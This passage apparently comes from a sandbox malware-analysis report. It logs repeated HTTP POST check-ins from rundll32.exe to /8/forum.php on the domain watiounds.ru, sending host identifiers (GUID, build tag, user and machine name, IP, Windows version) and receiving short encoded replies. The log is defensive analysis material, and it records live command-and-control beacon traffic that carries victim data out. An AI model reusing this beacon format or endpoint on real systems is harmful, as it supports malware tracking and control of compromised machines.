                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 4b 50 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBKPYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          185 | 192.168.2.22 | 49350 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:48.533744097 CEST | 242 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:48.656527996 CEST | 242 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZYBAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          186 | 192.168.2.22 | 49351 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:48.975303888 CEST | 243 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:49.108551025 CEST | 244 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4b 50 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYKPBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          187 | 192.168.2.22 | 49352 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:49.431199074 CEST | 244 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:49.563074112 CEST | 245 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 4d 4e 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAMNZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          188 | 192.168.2.22 | 49353 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:49.878778934 CEST | 245 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:50.015465021 CEST | 246 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 42 59 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNBYMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          189 | 192.168.2.22 | 49354 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:50.332216978 CEST | 246 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:50.458316088 CEST | 247 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4b 50 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZKPAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          19 | 192.168.2.22 | 49184 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:03.358542919 CEST | 53 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:03.484359026 CEST | 53 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFBYUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          190 | 192.168.2.22 | 49355 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:50.774102926 CEST | 248 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:50.900412083 CEST | 248 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 42 59 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYBYBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          191 | 192.168.2.22 | 49356 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:51.215806961 CEST | 249 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:51.339344025 CEST | 249 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 5a 41 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYZABARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          192 | 192.168.2.22 | 49357 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:51.652221918 CEST | 250 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:51.780009985 CEST | 250 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4d 4e 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYMNBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          193 | 192.168.2.22 | 49358 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:52.100404024 CEST | 251 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:52.246025085 CEST | 251 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTZAGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          194 | 192.168.2.22 | 49359 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:52.585014105 CEST | 252 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:52.714637995 CEST | 252 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:52 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGZATARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          195 | 192.168.2.22 | 49360 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:53.024794102 CEST | 253 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:53.147536993 CEST | 254 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 43 58 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZCXAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          196 | 192.168.2.22 | 49361 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:53.464418888 CEST | 254 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:53.586973906 CEST | 255 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:53 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 59 42 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFYBUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          197 | 192.168.2.22 | 49362 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:53.894011021 CEST | 256 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:54.019001007 CEST | 256 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZNMAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          198 | 192.168.2.22 | 49363 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:54.330005884 CEST | 257 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:54.455307007 CEST | 257 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 5a 41 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCZAXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          199 | 192.168.2.22 | 49364 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:54.780611038 CEST | 258 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:54.903017044 CEST | 258 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:54 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 51 4a 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBQJYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          2 | 192.168.2.22 | 49167 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:16:44.986207008 CEST | 6 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:16:45.113055944 CEST | 7 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:16:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZJQAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          20 | 192.168.2.22 | 49185 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:18.564796925 CEST | 56 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:18.691098928 CEST | 56 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
